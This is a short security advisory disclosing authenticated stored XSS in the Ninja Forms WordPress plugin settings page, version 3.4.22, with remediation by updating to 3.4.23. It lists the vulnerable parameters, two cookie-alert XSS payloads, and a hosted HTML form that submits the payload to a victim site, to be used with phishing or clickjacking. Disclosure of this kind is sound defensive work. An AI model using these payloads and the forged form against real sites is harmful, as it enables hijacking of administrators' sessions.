Multiple Authenticated Stored XSS in NinjaForms Settings Page (Version 3.4.22 )

By Spider SecVulnerability Discovery

Authenticated Stored XSS in NinjaForms Settings Page (Version 3.4.22 )

 

Background

A Spider Sec Ltd consultant discovered an Authenticated Stored XSS vulnerability inside the Ninja forms WordPress Plugin which could allow attackers to hi-jack administrative cookies if an attack is coupled together with a phishing campaign.

 

Technical Details

The following parameters are vulnerable to Stored XSS on the administrative section of the Ninja Forms WordPress Plugin:

ninja_forms[date_format]=, ninja_forms[recaptcha_site_key]=, ninja_forms[recaptcha_lang]=

Using the following payload:

m/d/Yufyiy' onfocus=alert(document.cookie) autofocus= etyeqchypbw

bybcn'%20onfocus%3dalert(document.cookie)%20autofocus%3d%20jel7pcgk34v

So how can a hacker use this to attack my administrative panel?

Yes, but it requires a phishing campaign and a pretty trusting administrator.

First, create a button which submits the vulnerable POST and host it.

<form action="http://VictimsURL/wp-admin/admin.php?page=nf-settings" method="POST">
--snip--
<input name="ninja_forms[date_format]" type="hidden" value="zm/d/Yufyiy' onfocus=alert(document.cookie) autofocus= etyeqchypbw" />
--snip--
<input type="submit" value="Submit request" />
</form>

Next, persuade a victim to press the button, this would obviously be styled in a more persuasive manner or hidden inside a clickjacking attack.

The code is then stored on the back-end waiting for the administrator to access the settings page, wherein it will trigger.

Remediation

Update to version 3.4.23